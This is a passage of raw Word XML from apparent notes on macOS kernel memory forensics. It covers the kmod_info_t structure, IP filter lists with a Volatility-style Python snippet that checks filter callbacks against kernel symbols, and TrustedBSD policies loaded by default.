          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> * kernel.  If you need to work with a kmod_info_t structure outside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> * the kernel, please use the compatibility definitions below.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmod_info</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struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmod_info</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t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int32_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>info_version</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version of this structure</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uint32_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KMOD_MAX_NAME</w:t>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char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>KMOD_MAX_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int32_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reference_count</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 linkage refs to this </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kmod_reference_t</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t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reference_list</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who this refs (links on)</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vm_address_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>address</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starting address</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vm_size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>size</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total size</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vm_size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hdr_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// unwired hdr size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmod_start_func_t</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t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmod_stop_func_t</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t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="808080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kmod_info_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRPr="00321BA4" w:rsidRDefault="0033335A" w:rsidP="0033335A"/>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc445313280"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRPr="00D1197D" w:rsidRDefault="0033335A" w:rsidP="0033335A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="00D94C02" w:rsidP="0033335A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc445313281"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc445313282"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip filters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0009058C">
        <w:t>_ipv4_filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRPr="007279AA" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0009058C">
        <w:t>_ipv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0009058C">
        <w:t>_filters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRPr="007279AA" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="425"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRPr="00D1197D" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc445313283"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip_filter_list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc445313284"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip_filter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc445313285"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enum ip filters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0033335A" w:rsidP="0033335A"/>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">        list_addrs = [self.addr_space.profile.get_symbol("_ipv4_filters"), self.addr_space.profile.get_symbol("_ipv6_filters")]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">        for list_addr in list_addrs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">            plist = obj.Object("ipfilter_list", offset = list_addr, vm = self.addr_space)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C"/>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">            # type 'ipfilter'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">            cur = plist.tqh_first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C"/>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">            while cur:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                filter = cur.ipf_filter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                name = filter.name.dereference()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                yield self.check_filter("INPUT", name, filter.ipf_input, kernel_symbol_addresses, kmods)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                yield self.check_filter("OUTPUT", name, filter.ipf_output, kernel_symbol_addresses, kmods)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                yield self.check_filter("DETACH", name, filter.ipf_detach, kernel_symbol_addresses, kmods)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0009058C" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033335A" w:rsidRDefault="0009058C" w:rsidP="0009058C">
      <w:r>
        <w:t xml:space="preserve">                cur = cur.ipf_link.tqe_next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0BBE" w:rsidRDefault="003D0BBE" w:rsidP="0009058C"/>
    <w:p w:rsidR="003D0BBE" w:rsidRDefault="003D0BBE" w:rsidP="003D0BBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc445313286"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TrustedBSD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760310" w:rsidRDefault="00760310" w:rsidP="00760310">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A0651" w:rsidRDefault="000A0651" w:rsidP="00760310">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A0651" w:rsidRPr="000A0651" w:rsidRDefault="000A0651" w:rsidP="000A0651">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>From my t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">esting, it seems all Macs have </w:t>
      </w:r>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27E5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SandBox</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27E5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Quarantine</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”, and “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27E5A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TMSafetyNet</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0651" w:rsidRDefault="000A0651" w:rsidP="00760310">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A0651">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loaded by default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A0651" w:rsidRDefault="000A0651" w:rsidP="00760310">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D0BBE" w:rsidRPr="000A0651" w:rsidRDefault="00760310" w:rsidP="000A0651">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
